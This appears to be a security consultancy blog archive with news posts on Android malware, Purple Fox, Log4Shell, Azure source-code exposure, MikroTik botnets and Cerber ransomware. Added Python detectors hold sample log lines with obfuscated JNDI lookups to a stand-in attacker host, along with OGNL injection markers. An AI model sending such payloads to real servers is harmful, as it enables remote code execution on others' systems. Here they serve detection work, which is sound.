Airzero Sec

We Do Not Give Up! Trust Us!


In computer security, a vulnerability is a weakness which can be exploited by a threat actor, such as an attacker, to cross privilege boundaries within a computer system.

Malware can infect your Android phone in the same way that it can infect your computer. It slows down your system and causes glitches that make it difficult to use your phone. To protect your phone and yourself, you must act quickly. There are steps you can take to remove malware and protect your phone in the future, whether you downloaded an infected app or visited a corrupted website.

How to Get Rid of Malware and Viruses?

The initial step is to locate the malware on your phone. We'll show you how to do it, and then we'll give you some protection options, as well as antivirus apps you can use to restore your phone's health and keep it safe in the future.

Step 1: Turn off the phone until you have determined the specifics.

Once you've determined that your phone has been infected with malware, hold the power button down and turn the phone off completely. It will not prevent the malware from causing damage, but it will prevent the problem from worsening and may halt ongoing malware attempts to access nearby networks.

Shutting down also gives you time to reflect and conduct research. Do you know which infected app installed malware on your device? Do you know what other software it may have downloaded without your permission? If not, switch to a different computer and look up your symptoms (along with any new apps you tried out) to narrow down the problem. You can't remove an app if you can't find it at the source of the problem.

Step 2: While working, switch to safe/emergency mode. When you restart your device and attempt to isolate the problematic app, go into safe mode first. This will help to limit the amount of damage the infected app can cause.

Step 3: To enter safe mode on most Android devices, hold down the power button for a few seconds while the device is turned on, then tap and hold the Power off option.

Step 4: This should bring up a few power options, including a Reboot to safe mode option.

Select this mode and wait for your phone to reboot before proceeding. If you can't find a safe mode, use aeroplane mode to disconnect your device from all networks. That option is usually at the top of your notifications shade.

Note: If you can't figure out what's causing your malware problem after downloading a security app, don't tinker. Consult a professional to determine whether you should wipe your phone. This is a good strategy if ransomware, which is becoming more common, takes control of your phone and prevents you from doing anything.

Step 5: Navigate to Settings and locate the app.

On your Android device, go to Settings. Settings are typically represented by a gear-shaped icon, but this varies depending on your theme and layout: if you're having trouble finding it, search for it.

Step 6: In Settings, scroll down to the Apps section and click it. Look for a list of all your current apps — you may need to select App Manager to see the entire list.

Step 7: Once there, scroll down until you find the infected app that is causing your issues.

Step 8: Select the app, and you should be able to uninstall, force close, or force stop it (often, you cannot uninstall core apps, only disable them, but these apps are unlikely to be the problem).

Step 9: Select Uninstall to delete the infected app and anything else suspicious, and your Android device should remove the app in question. It's also a good idea to go through your app list and uninstall any suspicious downloads — if you haven't looked through this list before, you might be surprised at some of the strange things your device has on it.

What should you do if you are unable to uninstall the app?

In some cases, you will be unable to uninstall the problematic app. In fact, the option to delete may not exist at all. Instead, you'll see Disable on the menu, and that'll be the end of it. An app with superpowers (and potentially dangerous malware or ransomware) can gain access to your administrator settings. The app may have granted itself administrative privileges in order to protect itself from deletion.

Step 1: Simply return to the original Settings menu and scroll down to Lock Screen and Security (or a similar corresponding section).

Step 2: In the Security menu, look for a tab labeled Phone (Device) Administrators. Keep in mind that depending on the hierarchy of your security menu, you may need to go to Other security settings first. You should be able to find the setting that allows the malware to camp out in Phone Administrators.

Step 3: After that, all you have to do is revoke that administrator permission and you can finally delete the app.

Get some Malware Protection

It's a good idea to give each Android device plenty of security and malware protection, and it's especially important to install antivirus software if you've had bad luck with questionable apps in the past. After you have manually deleted the app that is causing you problems, you will need to increase the overall security of your phone.

Fortunately, there are plenty of security apps available. Rather than downloading multiple apps that only do one or two things, look for a security app that has all of the features you need in one. A good security app will be able to delete junk or spam files, scan for viruses, and keep your data safe. Some apps have options to automatically delete any questionable software.

We recommend Safe Security, AVG Antivirus, or Avast Antivirus, all of which can be downloaded from the Google Play Store. In addition, we have a comprehensive guide to Android security and antivirus recommendations. You'll notice that your device performs better overall once you've downloaded proper malware protection.

Remember to always keep your software up to date with the latest version. Your devices should do this automatically, but you can manually check for updates on a regular basis. Your phone will be far more vulnerable to attack if you do not install updates regularly. If you have any doubts about this topic, please contact us. Airzero Sec will be your security partner.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

PhoneSpy can steal important data, obtain the full list of installed apps, record audio and video in real time, extract device information, and even grant remote access to the device. Malware that spies on Android devices has been discovered in 23 apps. This Android malware, known as PhoneSpy, has been active in the US and Korean markets. One ray of hope is that none of the infected apps were available on Google Play.

PhoneSpy can steal critical data such as images, call logs, contacts, and messages, as well as obtain the full list of installed apps and record audio and video in real time. "The app has the ability to uninstall any user-installed applications, including mobile security apps." The malicious actors have real-time access to the device's precise location, all without the victim's knowledge. "The spyware also allows the threat actor to use phishing pages to harvest Facebook, Instagram, Google, and Kakao Talk credentials," the agency said in a statement.

To stay safe from such malware, users should never install apps from untrusted sources on their phones. In addition, never click on links or download attachments sent in suspicious emails or messages.

Airzero Sec is at the cutting edge of security technology, supporting you in conquering the most complex security challenges. If you have any questions, please contact us.


Trojanized installers for the Telegram chat app are being used to spread the Windows-based Purple Fox backdoor on infected PCs.

According to recent research from Minerva Labs, the attack differs from other types of intrusions that often exploit legitimate software to deliver harmful payloads.

"By separating the attack into considerable little files, the majority of which had very low detection speeds by engines, with the last stage leading to Purple Fox rootkit infection," said researcher Natalie Zargarov.

Purple Fox was identified in 2018 and possesses rootkit characteristics, allowing it to elude detection by being planted outside the reach of security solutions. In a March 2021 study, Guardicore described its worm-like propagation function, which allows the backdoor to proliferate faster.

Then, in October 2021, Trend Micro researchers uncovered FoxSocket, a .NET implant used in conjunction with Purple Fox to interact with its command-and-control (C2) servers using WebSockets for a more secure method of communication.

The researchers concluded, "Purple Fox stays on impacted systems longer and delivers extra payloads."

Finally, in December 2021, Trend Micro revealed the later stages of the Purple Fox infection chain, which include targeting SQL databases by inserting a malicious SQL common language runtime (CLR) module to gain a more persistent and stealthier foothold, and eventually abusing SQL servers for illicit cryptocurrency mining.

Minerva identified a new attack chain that starts with a Telegram installer file: an AutoIt script that drops a legitimate Telegram installer along with a malicious downloader called "TextInputh.exe," which is used to fetch next-stage malware from the C2 server.

Following that, the downloaded files disable antivirus engine processes before moving on to the last stage, which involves downloading and executing the Purple Fox rootkit from a now-defunct remote server.

"We detected a huge number of malware installers that used the same attack chain to deploy the same Purple Fox rootkit version," Zargarov added. "The attack's beauty is that each stage is segregated into its own file, leaving it unusable without the complete file set."

Every business faces daunting challenges when it comes to protecting its assets:

  • Threats that are new and evolving

  • Regulations governing privacy and compliance

  • The increased risk associated with digital transformation

With hundreds of point-solution dealers and cheap, inadequate tools, companies face a cyber security dilemma that can only be solved by a truly integrated cyber defense.

Airzero Sec is driving innovation to assist you in overcoming your most difficult challenges. If you have any questions about the fake Telegram messenger app, contact us through the email given below.


A team of researchers from the University of California, Santa Barbara, has demonstrated a "scalable technique" for vetting smart contracts and mitigating state-inconsistency bugs, uncovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs that are stored on the blockchain and are automatically executed when predetermined conditions are met based on the agreement's encoded terms. They enable anonymous parties to carry out trusted transactions and agreements without the need for a central authority.

In other words, the code is intended to be the final arbiter of "the deal" that it represents, with the program controlling all aspects of execution and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also implies that vulnerabilities in the code could result in significant losses, as evidenced by hacks against the DAO and, more recently, MonoX, in which adversaries exploited loopholes to illicitly syphon funds, a scenario that could have disastrous consequences given the burgeoning adoption of smart contracts in recent years.

"Because smart contracts are not easily upgradeable, auditing the contract's source prior to deployment and deploying a bug-free contract is even more important than in the case of traditional software," the researchers wrote in a paper.

Enter Sailfish, which aims to detect state inconsistency vulnerabilities in smart contracts that allow an attacker to tamper with transaction execution order or take over control flow within a single transaction (i.e., reentrancy).

The tool operates as follows. Given a smart contract, Sailfish converts it into a dependency graph that captures the control- and data-flow relations between storage variables and the contract's state-changing instructions. It then uses that graph to identify potential flaws by defining hazardous access, implemented as graph queries that determine whether two different execution paths, at least one of which performs a write, operate on the same storage variable.
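As an added, much simplified illustration of the hazardous-access idea (not Sailfish's own code or its graph representation), the following Python models each contract function as an execution path of storage reads, writes and external calls over a constructed toy withdraw/deposit contract, then runs the pairwise query described above and refines it for reentrancy by treating the steps after an external call as a path of their own.

```python
# Each function of the contract is modelled as one execution path: an ordered
# list of (op, storage_variable) steps, where op is "read", "write" or "call"
# (an external call that hands control to another, possibly hostile, contract).
# The contract model below is constructed for this illustration: a toy
# withdraw/deposit pattern, not a real deployed contract.
CALL = ("call", None)

CONTRACT_PATHS = {
    "deposit": [("read", "balances"), ("write", "balances")],
    # sends Ether first, zeroes the balance afterwards
    "withdraw_vulnerable": [("read", "balances"), CALL, ("write", "balances")],
    # checks-effects-interactions order: state updated before the external call
    "withdraw_fixed": [("read", "balances"), ("write", "balances"), CALL],
    "get_owner": [("read", "owner")],
}


def storage_vars(steps):
    """Storage variables touched by a sequence of steps (calls touch none)."""
    return {var for op, var in steps if op != "call"}


def writes(steps, var):
    """True if the sequence writes the given storage variable."""
    return any(op == "write" and v == var for op, v in steps)


def hazardous_accesses(paths):
    """Hazardous access as the paper defines it: two different paths that both
    touch the same storage variable, at least one of them writing it."""
    found = []
    names = sorted(paths)
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            for var in sorted(storage_vars(paths[a]) & storage_vars(paths[b])):
                if writes(paths[a], var) or writes(paths[b], var):
                    found.append((a, b, var))
    return found


def reentrancy_candidates(paths):
    """Refine hazardous access for reentrancy: while an external call is in
    flight, any path (the same function included) may run. If the steps after
    the call form a hazardous access with that path, the state read before the
    call can be stale by the time it is written back."""
    found = []
    for p1, steps in paths.items():
        if CALL not in steps:
            continue
        after_call = steps[steps.index(CALL) + 1:]
        for p2, steps2 in paths.items():
            for var in sorted(storage_vars(after_call) & storage_vars(steps2)):
                if writes(after_call, var) or writes(steps2, var):
                    found.append((p1, p2, var))
    return found


if __name__ == "__main__":
    for item in hazardous_accesses(CONTRACT_PATHS):
        print("hazardous access:", item)
    for item in reentrancy_candidates(CONTRACT_PATHS):
        print("reentrancy candidate:", item)
```

Only withdraw_vulnerable produces reentrancy candidates; withdraw_fixed has no storage operations after its external call, so the same query on it stays empty.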

The researchers tested Sailfish on 89,853 contracts obtained from Etherscan, discovering 47 zero-day vulnerabilities that could be exploited to drain Ether and even corrupt application-specific metadata.

This also includes a vulnerable contract implementing a housing tracker that could be abused in such a way that a homeowner could have multiple active listings. The study's findings will be presented at the IEEE Symposium on Security and Privacy (S&P) in May 2022.

This is not the first time that academics have been drawn to problematic smart contracts. In September 2020, Chinese researchers created a framework for categorizing known vulnerabilities in smart contracts, with the goal of providing a detection criterion for each bug.

Airzero Sec's cybersecurity experts have worked on a wide range of projects for a number of well-known companies for many years. Use our previous experience to your advantage, whether it's to assist you in getting there or to perform technical tests. If you have any doubts about the issue discussed above, please do not hesitate to get in touch with us.


Microsoft has issued a warning about continuous attempts by nation-state adversaries and commodity attackers to use security holes in the Log4j open-source logging platform to spread malware on vulnerable computers.

"Exploitation shots and testing have remained high over the closing weeks of December," according to revised guidance published earlier this week by the Microsoft Threat Intelligence Center (MSTIC). "We've seen a number of living attackers incorporate these vulnerabilities into their existing malware kits and methods, ranging from coin miners to hands-on-keyboard attacks," the guidance added.

The Apache Software Foundation formally revealed the remote code execution (RCE) vulnerability in Apache Log4j 2, dubbed Log4Shell, on December 10, 2021, and it has since emerged as a new attack vector for a number of threat actors.

Four more vulnerabilities in the utility were discovered in the weeks after that — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — allowing opportunistic bad actors to maintain persistent control over compromised machines and mount an evolving collection of attacks ranging from cryptocurrency miners to ransomware.

Attackers are also trying to circumvent string-matching detections by obfuscating the malicious HTTP requests that get written to a web request log by Log4j, where the JNDI lookup then triggers a request to the attacker-controlled site, even as mass scanning attempts continue unabated.
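As an added illustration (not from the Microsoft guidance), the following Python peels the lookup-obfuscation layers off a request log line before matching on the JNDI lookup, which is how string-matching detections keep working against the evasions mentioned above; the log lines are constructed samples and the hostnames are placeholders.

```python
import re

# Constructed sample request log lines (not real traffic). Lines 2-5 carry the
# Log4j lookup forms that public detection rules look for; hosts are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:rmi://attacker.example/b}"',
    '10.0.0.10 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.68.0"',
]

# An innermost ${...} lookup: a body with no nested braces.
_INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# What we are looking for once the obfuscation layers are peeled off.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate one innermost lookup the way Log4j 2 would, for the
    obfuscation-relevant forms only; returns None when it is left untouched."""
    if body.lower().lstrip().startswith("jndi"):
        return None  # never rewrite the lookup we want to detect
    if ":-" in body:  # default-value form: ${env:MISSING:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    kind, _, arg = body.partition(":")
    kind = kind.strip().lower()
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    return None  # ${date:...}, ${sys:...} and the like are left as they are


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Peel nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def replace(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNER_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def is_jndi_lookup(text: str) -> bool:
    """True when the text contains a JNDI lookup, plain or obfuscated."""
    return bool(_JNDI.search(normalize_lookups(text)))


def scan_log(lines):
    """Return (1-based line number, normalized line) for every line that triggers."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, line in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

Normalizing before matching is what keeps the rule from being bypassed by the nested lower/upper/default-value lookups; a plain substring match for "jndi:" would only catch line 2.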

"Rapid approval of the exposure into living botnets like Mirai, past efforts targeting susceptible Elasticsearch servers to deploy cryptocurrency miners, and activities distributing the Tsunami backdoor to Linux systems," according to Microsoft. Additional remote access toolkits and reverse shells, such as Meterpreter, Bladabindi (aka NjRAT), and habitsRAT, have been delivered via the Log4Shell vulnerability.

"Clients should consider the general availability of exploit code and scanning capabilities to be a simple and present threat to their environments at this time," MSTIC warned. "Because of the massive number of vulnerable software and services, as well as the rapid pace of progress, remediation is projected to take a long time, needing continued, long-term attention."

The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take appropriate steps to safeguard customer data from exposure as a result of Log4j, or equivalent known vulnerabilities in the future."

For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our previous experience, whether it's to aid you in getting there or to undertake technical tests. If you have any doubts about the above topic, don't hesitate to contact us. Airzero Cloud will be your digital companion.


The flaw could reveal passwords and access tokens, as well as blueprints of the internal infrastructure that help an attacker find software vulnerabilities. A four-year-old vulnerability in Microsoft Azure App Service could expose the source code of web applications written in PHP, Python, Ruby, or Node that were deployed using Local Git, researchers said. According to an analysis by Wiz, the bug was almost certainly exploited in the wild as a zero-day. The company named the vulnerability "NotLegit" and stated that it has existed since September 2017.

Azure App Service is a cloud-based platform for hosting websites and web applications. Local Git, meanwhile, enables developers to initialize a local Git repository in the Azure App Service container and deploy code directly on the server. Once deployed, the application is available to anyone on the Internet under the * domain.

The problem arises because, when Local Git is used, the Git folder is deployed and publicly accessible on unpatched systems: it sits in the "/home/site/wwwroot" directory, which anyone can reach. According to the company, this has serious security consequences. "In addition to the case of the source including secrets such as passwords and access tokens, leaked source code is often used for more complex attacks, such as collecting information about the R&D department, learning about the internal infrastructure and finding software vulnerabilities," the researchers stated in a publication this week. "Finding susceptibilities in software is much more comfortable when the source code is available." They added, "Basically, all an opposing actor had to do was find the '/.git' directory of the target application and get the source code."

Botched Mitigation

Microsoft initially deployed mitigation in the form of adding a "web.config" file to the Git folder within the public directory, which restricted public access; however, it turns out that this is an incomplete fix. According to Wiz, "only Microsoft's IIS web server handles web.config files." "However, if you use PHP, Ruby, Python, or Node... these programming languages are deployed with different web servers that do not handle web.config files, leaving them unaffected by the mitigation and thus completely vulnerable."
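Because web.config is honoured only by IIS, an application running on one of the other stacks has to refuse requests into the repository directory itself. The following is an added illustration of that guard for a Python (WSGI) app, not Microsoft's fix or Wiz's code; the middleware and app names are hypothetical, and the same idea applies to the PHP, Ruby and Node servers mentioned above.

```python
from urllib.parse import unquote


def touches_git_dir(path: str) -> bool:
    """True when any path segment is a .git directory (case-insensitive).
    The path is percent-decoded once so '/%2egit/HEAD' is caught as well, and
    backslashes are treated as separators because some servers accept them."""
    decoded = unquote(path).replace("\\", "/")
    return any(segment.lower() == ".git" for segment in decoded.split("/"))


class DenyGitFolder:
    """WSGI middleware (hypothetical name) that refuses requests into a .git
    directory before the application or its static-file handler sees them."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if touches_git_dir(environ.get("PATH_INFO", "")):
            # 404 rather than 403, so the response does not confirm the folder exists
            start_response("404 Not Found", [("Content-Type", "text/plain")])
            return [b"Not Found"]
        return self.app(environ, start_response)


def wwwroot_app(environ, start_response):
    """Stand-in for the deployed app: like a naive static handler it would
    happily serve anything under the web root, repository metadata included."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"contents of " + environ["PATH_INFO"].encode()]


protected_app = DenyGitFolder(wwwroot_app)


def handle(app, path: str):
    """Drive one GET request through a WSGI app; returns (status, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app({"REQUEST_METHOD": "GET", "PATH_INFO": path}, start_response))
    return captured["status"], body


if __name__ == "__main__":
    for path in ("/index.php", "/.git/HEAD", "/.git/config", "/app/.GIT/objects/x", "/%2egit/HEAD"):
        print(path, "->", handle(protected_app, path)[0])
```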

Wiz reported the lingering bug to Microsoft in October and was awarded a $7,500 bounty for the discovery; the computing giant distributed fixes to affected users via email between December 7 and 15.

Likely Exploited in the Wild

Git folders are frequently revealed by mistake due to misconfiguration, and as a result, cybercriminals are on the lookout for them, researchers warned.

"An exposed Git folder is a typical security flaw that users commit without even recognizing it," they wrote. "Malicious actors are always searching the internet for exposed Git folders from which to steal secrets and intellectual property."

Wiz set up a vulnerable Azure App Service application and attached it to an unused domain to see if it could be exploited.

"We patiently paused to see if anyone tried to access the Git files," they wrote. "Within four days of deploying, we were unsurprised to see various requests for the Git folder from unknown actors... this exploitation approach is extremely simple, common, and actively exploited."

According to Wiz, the below users should assess the potential risk and ensure that their systems are up to date:

  • Users who deployed code via FTP, Web Deploy, or Bash/SSH, so that files already existed in the web app before any Git deployment.
  • Users who relied on Local Git in the web app.
  • Users who subsequently used the Git clone sequence to publish updates.

"Because the security flaw was in an Azure service, cloud users were exposed on a large scale, and without their knowledge or control," researchers wrote.

Airzero Sec's Cyber Security Consulting specialists have worked on various projects for a number of famous corporations for years. Use this experience as needed, whether it is to help you get there or to carry out technical checks. If you have any doubts about the above topic, please contact us. Airzero Sec will be your digital partner.


Here's what cybersecurity experts want information security professionals to know as we approach 2022.

Nobody could have predicted the total chaos that the cybersecurity industry would face in 2021. Record-breaking ransomware attacks, SolarWinds' supply-chain devastation, and, most recently, the discovery of Log4j by...Minecraft players. All of this would have sounded far too outlandish a year ago.

Nonetheless, here we are.

Predictions for the coming year seem audacious given the previous 12 months, so Threatpost spoke with industry experts and developed this list of the five top trends to watch in 2022.

  • There Will Be Increasing Government Interest, Effect in Cybersecurity

The government's interest in cybersecurity will grow, as will its influence.

SolarWinds, the Colonial Pipeline attack, malware, and privacy issues have attracted the interest of governments throughout the world, and experts agree that new legislation and investments will be implemented in the coming year.

In the months running up to the 2020 elections, governments were focused on the spread of disinformation to affect election outcomes, but other urgent national security concerns surfaced in the aftermath of significant cyberattacks on critical infrastructure. These urgent cyber risks, according to researchers, will continue to dominate government attention until 2022.

According to Jonathan Reiber, who served as the Office of the Secretary of Defense's chief strategy administrator for cyber-policy during the Obama administration and is now the senior director of cybersecurity strategy and policy at AttackIQ, the federal government is currently working to determine where resources can be most effectively deployed to shore up cyber-defenses.

Congress will most likely focus on national security risk analyses, according to Reiber.

"Trends show that the federal prioritizing debate in Congress will take the form of macro-level catastrophic risk research to manage the country's top-tier threats," he continued.

"Congress will consider how the federal government can assist in the management of systemic cybersecurity threats to the United States' economy and society, including mission-critical functions in key sectors such as healthcare, elections, and energy, building on previous research of companies across the country that could pose a strategic risk to the country if disrupted."

  • Social-Engineering Endures

People will still be people in 2022, and they will, for the most part, do what is easy, regardless of the impact on the security posture of the company. And cybercriminals will continue to rely on it to carry out their social engineering schemes.

Otherwise serious people can be remarkably careless during their working hours, and this is unlikely to change anytime soon.

"Everyone is responsible for cybersecurity, but few people realize how much harm their actions may inflict."

In addition to the frequently recommended user training, Wiacek urged that cybersecurity experts adapt their approach to internal communications in 2022.

"Most protection teams have a standing for saying 'no.' Instead, they must develop a reputation for saying 'yes.' Building a good security culture involves relationships, trust, and a strong passion for the customer experience – even if that customer is John in accounting."

Jason Hoenich, vice president of service delivery and security awareness at Arctic Wolf, agreed that security teams can do more to encourage employees to back their cause.

  • Supply Chain is the New Ransomware

According to Ian McShane, field CTO at Arctic Wolf, the industry will begin to adjust its perspective on ransomware this year, realizing that the problem is not the ransomware itself, but rather the access point.

"We'll move our attention away from what to do after an attack and toward how to anticipate and safeguard the first line of defence with data," McShane said. The number of supply-chain ransomware attacks is unlikely to decrease in the next 12 months, according to Deepen Desai, Zscaler's CISO and vice president of security research and operations.

McShane also recommended the industry embrace disclosures more fully.

The people who are most commonly exposed to supply-chain assault vectors are ordinary people.

In 2022, Troy Gill, senior manager of threat intelligence at Zix | AppRiver, predicts that emails will become more targeted.

  • Ransomware-as-a-Service Actors Pivoting to SMBs, Prospering

Ransomware-as-a-Service, which focuses on small and medium-sized businesses, has contributed to the expansion of digital extortion, and 2022 is predicted to be another banner year for ransomware threat actors.

"Cyber attackers have made it quite obvious that they make no distinction based on the magnitude of their targets," McShane added. Small and medium-sized enterprises that are underfunded and understaffed are attractive targets for ransomware gangs, since the government and large corporations invest heavily in cybersecurity.

  • Cybersecurity Industry Needs Better Coordination in 2022

Over the previous year, threat groups have shown their resilience by banding together to solve problems with increased cooperation. Cybersecurity? Not in the least.

"Threat actors are ready to band together for mutual success," Gill added, citing the emergence of malware-as-a-service and phishing-as-a-service. For example, when law enforcement shut down Emotet in January, TrickBot stepped in to assist and "began re-seeding Emotet conditions in order to get them back up."

According to Gill, even cybercriminals' adversaries appreciate the significance of a robust ransomware market capable of perfecting their weapons and producing noise to hide behind.

"As a result, we hope cybercriminals will make even more solid working relationships in 2022 to help them continue to succeed," Gill stated. According to Ian McShane, the cybersecurity community still has work to do to enhance the overall ecosystem. This means that, among other things, larger organizations share tools.

Airzero Sec's Cyber Security Consulting professionals have worked on projects for some of the most well-known companies in the world for years. Use the information as needed, whether it's to help you get there or to perform technical checks. Please contact us if you have any questions concerning this issue.


At least 300,000 IP addresses linked with MikroTik devices were found to be vulnerable to a variety of remotely exploitable security issues, which the popular router and wireless ISP equipment supplier has since fixed.

According to cybersecurity firm Eclypsium's data, shared with The Hacker News, China, Brazil, Russia, Italy, and Indonesia had the most affected devices, with the United States ranking ninth.

"These technologies are both robust and often incredibly susceptible," the researchers said. "As a result, threat actors have taken control of MikroTik devices for a variety of purposes, including DDoS attacks, command-and-control (also known as 'C2'), traffic tunneling, and more."

MikroTik devices are an enticing target, not least because there are more than two million of them in use worldwide, providing a vast attack surface for threat actors to launch a range of attacks.

Indeed, reports surfaced earlier this September of a new botnet known as Mēris that exploited a now-addressed security vulnerability in the operating system (CVE-2018-14847) to stage a record-breaking distributed denial-of-service (DDoS) attack on Russian internet company Yandex, using MikroTik network devices as an attack vector.

It's not the first time MikroTik routers have been utilized in a real-world attack. Trustwave, a cybersecurity firm, discovered at least three significant malware operations in 2018 that installed cryptocurrency miners on workstations connected to MikroTik routers that were not patched. According to China's Netlab 360, thousands of susceptible MikroTik routers were stealthily corralled into a botnet by leveraging CVE-2018-14847 to snoop on network traffic.

MikroTik devices that are vulnerable are distributed across the globe.

CVE-2018-14847 is one of four vulnerabilities identified in the last three years that potentially allow complete control of unpatched MikroTik devices:

  • CVE-2019-3977 (CVSS score: 7.5) - Inadequate validation of the upgrade package's origin in MikroTik RouterOS, allowing all usernames and passwords to be reset.

  • CVE-2019-3978 (CVSS score: 7.5) - Inadequate safeguards of a critical resource in MikroTik RouterOS, resulting in cache poisoning.

  • CVE-2018-14847 (CVSS score: 9.1) - Directory traversal vulnerability in the MikroTik RouterOS WinBox interface.

  • CVE-2018-7445 (CVSS score: 9.8) - SMB buffer overflow vulnerability in MikroTik RouterOS.

The most popular crypto mining script was identified on unprotected MikroTik devices.

As in previous attacks, business traffic may be tunneled to another location, or malicious content might be introduced into legitimate traffic.

MikroTik routers are not the only devices that have been roped into a botnet. Fortinet researchers reported this week how the Moobot botnet is expanding its network by leveraging a known remote code execution (RCE) vulnerability in Hikvision video surveillance equipment (CVE-2021-36260) and using the infected devices to launch distributed denial-of-service (DDoS) attacks.

Manga, aka Dark Mirai, botnet operators are actively exploiting a recently reported post-authentication remote code execution vulnerability (CVE-2021-41653) to hijack TP-Link routers and co-opt them into their network of infected devices, according to a new report.

For years, Airzero Sec's Cyber Security Consulting experts have worked on projects for some of the world's most well-known companies. Use that information as needed, whether it's to assist you in getting there or to make technical inspections. If you have any queries about this topic, please contact us.

Email:[email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

Cerber ransomware has resurfaced with new attack tactics: it has been observed attempting to exploit remote code execution vulnerabilities in Atlassian Confluence and GitLab servers.

Cerber's Name Reappears

Cerber ransomware has been targeting victims all over the world since last month, and the operators have been observed using both Windows and Linux encryptors.

  • The new variant shares no code with the earlier Cerber family: it uses the Crypto++ library, whereas the older variant used the Windows CryptoAPI.
  • The code differences, together with the absence of Linux variants in the older versions, suggest that a new threat actor has adopted the old Cerber name, Tor payment site, and ransom note.
  • The new version appends the '.locked' extension to encrypted files and drops ransom notes named '__$$RECOVERY_README$$__.html'.
  • After a successful infection, the new Cerber group demands a ransom of $1,000 to $3,000 from its victims.

New Attack Strategies

The new attacks target servers by exploiting recently disclosed vulnerabilities in GitLab and Atlassian Confluence.

  • Cerber exploits CVE-2021-22205, a remote code execution vulnerability caused by improper validation of image files passed to GitLab's ExifTool component, and CVE-2021-26084, an OGNL injection vulnerability in Confluence.
  • Both flaws can be exploited remotely without authentication.
  • Both vulnerabilities also have publicly available proofs of concept, which makes targeting unpatched servers easy.
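As an added example (not code from this page, from Atlassian or from GitLab), the detector below scans web-server access log lines for exploitation attempts against the Confluence flaw, CVE-2021-26084. The endpoint paths and the '\u0027' and '#{' markers it looks for are those used by the public proofs of concept mentioned above; treat them as assumptions to adjust to what your own telemetry shows. The log lines are constructed. The GitLab flaw is not covered here because its payload sits inside the uploaded image file, which an access log does not record.

```python
"""Flag CVE-2021-26084 (Confluence OGNL injection) attempts in access logs.

Added example, not from the page or the vendors.  ASSUMPTIONS: the endpoint
paths and the markers below are those seen in public proof-of-concept code;
tune them to your own telemetry.  Because the OGNL payload may be sent in a
POST body that a standard access log does not record, a request to the
endpoint alone is a low-confidence hit and only a visible marker is high.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache/Tomcat "combined" access log format.
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# ASSUMPTION: endpoints exercised by public CVE-2021-26084 proofs of concept.
VULN_ENDPOINTS = (
    "/pages/createpage-entervariables.action",
    "/pages/doenterpagevariables.action",
)
# Java unicode escape for a single quote (used to break out of the template
# string), the OGNL expression opener, and a class reference typical of RCE
# payloads.  Compared case-insensitively after URL decoding.
STRONG_MARKERS = ("\\u0027", "#{", "@java.lang.runtime@")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None if it does not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[str]:
    """'high', 'low' or None for one parsed request."""
    target = unquote(entry["target"])          # %5Cu0027 -> \u0027, %23%7B -> #{
    path = target.split("?", 1)[0]
    if not path.endswith(VULN_ENDPOINTS):
        return None
    lowered = target.lower()
    if any(marker in lowered for marker in STRONG_MARKERS):
        return "high"
    return "low"


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per suspicious request, in log order."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue                         # skip unparsable lines
        level = classify(entry)
        if level is not None:
            hits.append({"ip": entry["ip"], "method": entry["method"],
                         "target": entry["target"], "status": entry["status"],
                         "confidence": level})
    return hits


# Constructed sample lines: one GET carrying the escape and OGNL opener in the
# query string, one POST to the endpoint with the payload in the (unlogged)
# body, two ordinary Confluence requests, and one line of noise.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2021:08:21:03 +0000] "GET /pages/createpage-entervariables.action'
    '?SpaceKey=x&queryString=%5Cu0027%2B%23%7B HTTP/1.1" 200 3912 "-" "python-requests/2.26.0"',
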